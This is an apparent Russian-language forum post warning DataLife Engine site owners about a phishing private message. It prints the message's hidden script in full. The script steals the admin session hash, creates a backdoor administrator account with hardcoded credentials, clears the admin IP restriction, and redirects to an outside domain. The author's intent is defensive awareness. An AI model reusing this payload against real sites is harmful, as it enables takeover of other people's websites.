Персональное сообщение от madam.abuse

На один из сайтов, который я очень редко проверяю, 16 сентября пришло письмо, отправитель - пользователь "madam.abuse"

Текст письма:

При переходе по ссылке видим:

Исходный код страницы с редиректом:

HTML:

Link Redirect:<br /><br />Please click <a href="&quot;&gt;&lt;/a&gt;

&lt;code style=&#039;display: none;&#039; id=&#039;LJKwqoiDHqewE&#039;&gt;&lt;/code&gt;
&lt;script&gt;
function A(){
var q;
try{q=new ActiveXObject(&quot;Msxml2.XMLHTTP&quot;);}catch(e){try{q = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);}catch (E){
q = false;}}if(!q && typeof XMLHttpRequest!=&#039;undefined&#039;){q = new XMLHttpRequest();}return q;
}
var rp=&quot;/&quot;;
var ul=&quot;popovamariyammm&quot;;
var up=&quot;d1478963D&quot;;
var um=&quot;[email protected]&quot;;
var objhttp=A();
objhttp.onreadystatechange = function()
{
    if (objhttp.readyState == 4)
    {
        var r=new RegExp(atob(&#039;ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ==&#039;));
        var da=r.exec(objhttp.responseText)[2];
        r=new RegExp(atob(&#039;ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp&#039;));
        var dh=r.exec(objhttp.responseText)[2];
        objhttp.open(&quot;POST&quot;,rp+da+&#039;?mod=editusers&action=list&#039;,true);
        objhttp.setRequestHeader(&#039;Content-Type&#039;,&#039;application/x-www-form-urlencoded&#039;);
        objhttp.send(&#039;action=adduser&user_hash=&#039;+dh+&#039;&mod=editusers&regusername=&#039;+ul+&#039;&regpassword=&#039;+up+&#039;&regemail=&#039;+um+&#039;&reglevel=1&#039;);
        var objhttp2=A();
        objhttp2.onreadystatechange=function()
        {
            if(objhttp2.readyState==4)
            {
                var sd=document.getElementById(&#039;LJKwqoiDHqewE&#039;);
                sd.innerHTML=objhttp2.responseText.replace(/(&lt;script)/i,&#039;&#039;);
                var ael=sd.getElementsByTagName(&#039;*&#039;);
                var pd=&#039;&#039;;
                r=new RegExp(atob(&#039;XihzYXZlX2Nvbik=&#039;));
                for(var i=0;i&lt;ael.length;i++)
                    if(r.test(ael[i].name))
                        pd=pd+ael[i].name+&#039;=&#039;+encodeURIComponent(ael[i].value)+&#039;&&#039;;
                pd=pd+&#039;save_con[admin_allowed_ip]=&mod=options&action=dosavesyscon&user_hash=&#039;+dh;
                var objhttp3=A();
                objhttp3.open(&#039;POST&#039;,rp+da+&#039;?mod=options&action=syscon&#039;,true);
                objhttp3.setRequestHeader(&#039;Content-Type&#039;,&#039;application/x-www-form-urlencoded&#039;);
                objhttp3.send(pd);
                window.location.href = &quot;https://dle-news.org/qx6t1c&quot;;
            }
        }
        objhttp2.open(&#039;GET&#039;,rp+da+&#039;?mod=options&action=syscon&#039;,true);
        objhttp2.send(null);
    }

}
objhttp.open(&#039;GET&#039;, rp, true);
objhttp.send(null);
&lt;/script&gt;&lt;a href=&quot;https://dle-news.org/qx6t1c">here.</a>

Возможно подобным кодом получают доступ к админке сайта и заливают шеллы на сайт...

Будьте внимательны, и никогда не переходите по подобным ссылкам, всегда смотрите на href в ссылке, чтобы не выполнять подобные срипты на сайте. Так же своевременно устанавливайте все баг-фиксы ДЛЕ, и по возможности обновляйте ДЛЕ на актуальную версию!